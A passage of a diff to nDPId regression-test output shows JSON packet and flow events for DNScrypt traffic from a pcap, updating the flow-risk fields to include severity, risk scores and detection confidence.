AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":59,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhQAub0REv8KAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":59,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhUgAL0R7ioKAAAB0frxGZEDAbsGBBg48VYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":61,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhUAub0REv4KAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":61,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhZAAL0R0ekKAAAB0frxGZQ+AbsCCIXq8VUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhdAAL0R0egKAAAB0frxGYYUAbsCCIXq8VcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhggAL0R7icKAAAB0frxGefnAbsGBMFR8VgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":65,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhgAub0REvsKAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":65,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739304626,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":946739304626,"pkt":"ZmZmZmZmRERERERECABFAADPni1AADcRISDR+vEZCgAAAQG7gBkAu2Pi8VmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="}
@@ -151,55 +151,55 @@
 00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739304628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":946739304628,"pkt":"ZmZmZmZmRERERERECABFAADPni9AADcRIR7R+vEZCgAAAQG7kQMAu1L78VaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAfYAKepZwtScVP1uN5sT5N32akeuKSAV4oXU5Dhs9DYGIJJAdGKfXtNXiElvsQvm00KyC1gH3yBcsV0UHMhcHDXsbONUID12Y3+IJuxI0oT3pvizj3NQWIv0z50xYMyIaexs41QgPXZgAAAABX1N8A19UzYM="}
